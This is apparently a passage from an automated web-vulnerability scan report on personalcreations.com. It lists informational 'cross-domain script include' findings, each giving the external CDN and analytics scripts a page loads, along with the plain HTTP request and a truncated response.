<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.32. http://www.personalcreations.com/personalized-housewarming-gifts-PHOUSEW previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-housewarming-gifts-PHOUSEW

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /personalized-housewarming-gifts-PHOUSEW HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:21:17 PM?0&9/3/2011 6:21:26 PM?0&9/3/2011 6:21:17 PM?0&9/3/2011 6:22:13 PM?0&9/3/2011 6:22:11 PM?0&9/3/2011 6:22:27 PM?0&9/3/2011 6:22:29 PM?0&9/3/2011 6:22:58 PM?0&9/3/2011 6:22:53 PM?0&9/3/2011 6:22:44 PM?0&9/3/2011 6:23:35 PM?0&9/3/2011 6:23:24 PM?0&9/3/2011 6:23:47 PM?0&9/3/2011 6:24:04 PM?0&9/3/2011 6:23:35 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:23:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:23:35 GMT
Connection: close
Content-Length: 319449

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.33. http://www.personalcreations.com/personalized-pet-gifts-PPETBSL previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-pet-gifts-PPETBSL

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /personalized-pet-gifts-PPETBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:29:21 PM?0&9/3/2011 6:29:12 PM?0&9/3/2011 6:29:04 PM?0&9/3/2011 6:29:29 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:29:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:29:30 GMT
Connection: close
Content-Length: 268297

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.34. http://www.personalcreations.com/personalized-romantic-gifts-PLARBSL previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-romantic-gifts-PLARBSL

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /personalized-romantic-gifts-PLARBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:25 PM?0&9/3/2011 6:27:59 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:46 PM?0&9/3/2011 6:28:53 PM?0&9/3/2011 6:29:27 PM?0&9/3/2011 6:29:17 PM?0&9/3/2011 6:29:16 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:29:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:29:16 GMT
Connection: close
Content-Length: 310128

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.35. http://www.personalcreations.com/radioDefault.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/radioDefault.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://cdn.mercent.com/js/tracker.js

Request

GET /radioDefault.aspx HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:37 GMT
Connection: close
Content-Length: 10266

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head><link href='http://a1128.g.akamai.net/7/1128/497/0001
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script src="http://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.36. http://www.personalcreations.com/sitemap.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/sitemap.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
